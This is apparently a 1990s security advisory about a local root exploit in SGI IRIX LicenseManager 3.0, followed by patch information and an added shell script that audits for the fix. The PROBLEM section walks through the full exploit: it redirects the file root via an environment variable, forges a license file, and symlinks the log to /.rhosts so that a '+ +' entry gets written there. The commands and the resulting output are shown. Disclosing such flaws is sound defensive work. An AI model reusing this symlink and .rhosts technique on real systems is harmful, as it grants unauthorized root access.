COMMAND

    /usr/etc/LicenseManager

SYSTEMS AFFECTED

    IRIX 5.3, IRIX 6.1, 6.2, 6.3

PROBLEM

    Yes, LM 3.0 is far safer than 1.0, I agree with that.  So now it's
    not a newborn with a milk bottle but a teenager with a pack of gum
    in his locker at school (which he apparently forgot to lock).  Huge
    leap forward.

    As one can easily notice, LicenseManager 3.0 (LM30 for short) is
    considerably enhanced compared to LM 1.0.  For example, if one
    tries to repeat the recently published exploit for LM 1.0, it won't
    work, because /.rhosts is not in /var/flexlm/licensefile.db.  So a
    brute force attack won't work.  RTFMing can help to find that out
    right away, and as far as I can tell it seems to work.  So let's
    just abandon the whole idea of forging the license file and go
    investigate what other file I/O the program actually does.  The
    most important files live in /var/flexlm.

    /var/flexlm/license.dat.log is not in that writable-files database,
    but obviously LM30 writes to it.  Exactly what we need.  But how to
    use it?

    Our friend strings tells us how.  Among the wide variety of
    environment variables used by LM30 one stands alone:
    LICENSEMGR_FILE_ROOT.  The very name says what it's for -- getting
    root (on the system, but I guess the developers meant something
    else.  Whatever).  Some playing with it will quickly show that this
    variable indeed sets the root directory for LM30.  We can now pick
    a new root directory:

        mkdir -p /tmp/var/flexlm

    so that we have an exact equivalent of /var/flexlm, just with /tmp
    prepended to it.  LICENSEMGR_FILE_ROOT will make LM30 accept our
    understanding of what the right root directory is.

        setenv LICENSEMGR_FILE_ROOT /tmp

    Now, LM30 deals with licenses, so let's make one; we'll need it:

        cd /tmp/var/flexlm
        cat > license.dat
        #
        # FLEXlm license file
        #

        FEATURE \
        + + blah sgifd 1.00 01-jan-0 0 blah
        ^D

    The license is all set.  And of course we need a log file, don't we?

        ln -s /.rhosts license.dat.log

    Now check that your DISPLAY is set correctly, and, ladies and
    gentlemen, please welcome:

        LicenseManager &

    The front panel will show that LM30 indeed thinks of our little
    joke as a license.  Let's update it: click the Update... button.
    It will show four fields for us to fill out.  Putting blah in each
    of them will be fine.  Or whatever you feel is good input.  Some
    people like foo, I like blah.  And, finally, click Apply.
    Obviously, LM30 will be pissed at us, and it will log the record of
    our nasty behaviour and pop up some error dialog box -- just ignore
    it and go straight back to the original command line:

        cat /.rhosts

        Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

        #
        # FLEXlm license file
        #

        FEATURE \
        + + blah sgifd 1.00 01-jan-0 0 blah

    You know what happens  next, I guess.   Credit for this text  goes
    to Yuri Volobuev.

SOLUTION

    chmod -s /usr/etc/LicenseManager or get a new release of FLEXlm.
    For some extra info see #3 of this story in the mUNIXes section.
    As for IRIX, the best solution would be to apply the following
    patches:

        OS Version     Patch #
        ----------     -------
        IRIX 5.3       1678
        IRIX 6.1       upgrade
        IRIX 6.2       1678
        IRIX 6.3       1695
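
    A small POSIX sh audit for the two preconditions this advisory
    relies on (a setuid LicenseManager binary, and a symlink sitting
    where LM30 writes its log), added here as an example; it is not SGI
    or FLEXlm code, and the default paths are the ones from the advisory.

```sh
#!/bin/sh
# Added audit helper for the advisory above; not SGI or FLEXlm code.
# It checks the two things the SOLUTION relies on: that the manager
# binary no longer carries the setuid bit, and that nothing under the
# FLEXlm directory is a symlink that could redirect the log write.
# Default paths are those from the advisory; override via environment.

LM_BIN="${LM_BIN:-/usr/etc/LicenseManager}"
LM_DIR="${LM_DIR:-/var/flexlm}"

# 0 (true) when $1 has the setuid bit, i.e. 'chmod -s' was not applied.
lm_is_setuid() {
    [ -u "$1" ]
}

# 0 when $1 is a symbolic link (LM30 follows the path it is handed).
lm_is_symlink() {
    [ -h "$1" ]
}

# Print every symlink below directory $1, one per line (empty if none).
lm_list_symlinks() {
    find "$1" -type l 2>/dev/null || :
}

# Audit binary $1 and FLEXlm directory $2; return 0 if clean, 1 if any
# finding was printed.
lm_audit() {
    rc=0
    if lm_is_setuid "$1"; then
        echo "WARN: $1 is setuid; fix: chmod -s $1"
        rc=1
    fi
    if lm_is_symlink "$2/license.dat.log"; then
        echo "WARN: $2/license.dat.log is a symlink"
        rc=1
    fi
    links=$(lm_list_symlinks "$2")
    if [ -n "$links" ]; then
        echo "WARN: symlinks under $2:"
        echo "$links"
        rc=1
    fi
    return $rc
}

# Run the audit on the default paths unless sourced for the helpers.
if [ -z "${LM_AUDIT_SOURCED:-}" ]; then
    lm_audit "$LM_BIN" "$LM_DIR"
fi
```

    Exit status 1 means at least one finding was printed; the patches in
    the table above are still needed, since the check only confirms the
    workaround, not the fixed binary.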